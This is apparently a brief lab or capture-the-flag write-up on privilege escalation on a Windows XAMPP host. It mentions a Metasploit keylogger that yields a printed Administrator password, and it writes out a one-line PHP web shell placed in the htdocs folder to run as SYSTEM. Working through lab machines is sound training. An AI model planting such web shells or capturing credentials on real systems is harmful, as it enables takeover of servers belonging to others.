PrivEsc

The info says there are two ways to privesc.

Keylogger

Just running msfconsole, get a shell and listen to keystrokes exposes the Administrator credentials.

Administrator:Th3B3stH0sp1t4l9786!

XAMPP Misconfiguration

We know port 443 is open and running on Windows XAMPP server. If we put a shell inside the root folder C:\xampp\htdocs, it will run as NT AUTHORITY\SYSTEM.

So I did

echo '<?php system($_GET["cmd"]) ?>' > shell.php

It wont run. Interestingly, it has to be the write encoding.

So instead we have to do this:

echo '<?php system($_GET["cmd"]) ?>' | Out-File -Encoding UTF8 shell2.php

Now it works

PreviousEnumeration NextBlackfield

Last updated 10 months ago